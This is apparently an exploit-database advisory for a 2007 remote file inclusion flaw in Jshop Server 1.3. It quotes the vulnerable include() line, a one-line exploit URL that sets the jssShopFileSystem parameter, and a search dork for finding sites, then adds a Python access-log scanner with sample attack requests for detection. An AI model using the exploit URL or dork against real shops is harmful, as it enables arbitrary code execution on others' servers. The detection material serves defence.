Vendor: Jshop Server
By: irvian
N/A
CVSS
HIGH
Remote Code Execution
CWE
Product Name: Jshop Server
Affected Version From: Jshop Server 1.3
Affected Version To: Jshop Server 1.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Jshop Server 1.3 – Remote Code Execution

Jshop Server 1.3 is vulnerable to remote code execution through a file inclusion flaw. The script 'routines/fieldValidation.php' builds its include() path from the 'jssShopFileSystem' variable, which an attacker can set as a request parameter. Because the attacker controls where the included file is loaded from, they can execute arbitrary code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of Jshop Server or apply the necessary patches provided by the vendor.
Source

Exploit-DB raw data:

==========================================================================
# scripts       : Jshop Server 1.3
# Discovered By : irvian
# script        : http://www.jshop.co.uk/
# Thanks To     : #hitamputih #nyubicrew #patihack
# special To    : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz
# dork          :powered by jshop
--------------------------------------------------------------------------
file: routines/fieldValidation.php

include($jssShopFileSystem."resources/includes/validations.php");


exploit : www.target.com/routines/fieldValidation.php?jssShopFileSystem=[evilcode]

# milw0rm.com [2007-01-10]
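
With no patch listed, checking web server logs for use of this parameter is a practical first step. The following is an added example, not part of the original advisory or of Jshop: it flags access-log requests to routines/fieldValidation.php that set jssShopFileSystem in the query string. It assumes common/combined log format and that legitimate requests never pass this parameter in the URL; the sample lines and the `field=email` parameter are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script and parameter named in the advisory; compared case-insensitively
# so that probing with altered case is flagged too.
TARGET_SCRIPT = "routines/fieldvalidation.php"
PARAM = "jssshopfilesystem"

# Request field of a common/combined access-log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value begins with a stream wrapper or network path, so include() would
# load code from outside the server.
REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]+://|data:|//)", re.I)

# Constructed sample lines (documentation addresses, made-up values).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2007:10:00:01 +0000] "GET /routines/fieldValidation.php'
    '?jssShopFileSystem=http%3A%2F%2Fhost.example%2Fx%2F HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Jan/2007:10:00:05 +0000] "GET /shop/routines/fieldValidation.php'
    '?jssShopFileSystem=/var/tmp/ HTTP/1.1" 200 0',
    '198.51.100.4 - - [10/Jan/2007:10:01:00 +0000] "GET /routines/fieldValidation.php'
    '?field=email HTTP/1.1" 200 87',
    '198.51.100.4 - - [10/Jan/2007:10:01:02 +0000] "GET /index.php'
    '?jssShopFileSystem=x HTTP/1.1" 200 900',
]

def classify(line):
    """Return None, 'path-override' or 'remote-include' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith(TARGET_SCRIPT):
        return None
    # parse_qs percent-decodes; "name[]" array syntax is folded onto "name".
    values = [v for k, vs in parse_qs(url.query, keep_blank_values=True).items()
              if k.lower().split("[")[0] == PARAM for v in vs]
    if not values:
        return None
    if any(REMOTE_RE.match(v.strip()) for v in values):
        return "remote-include"
    return "path-override"   # parameter set at all: include prefix is request-controlled

def scan(lines):
    """Return (line index, verdict) for every flagged line."""
    return [(i, v) for i, v in ((i, classify(l)) for i, l in enumerate(lines)) if v]

if __name__ == "__main__":
    for idx, verdict in scan(SAMPLE_LOG):
        print(verdict, SAMPLE_LOG[idx])
```

Access logs record only the query string, so a value delivered in a POST body or cookie would not appear here and needs request-body logging or a WAF rule instead.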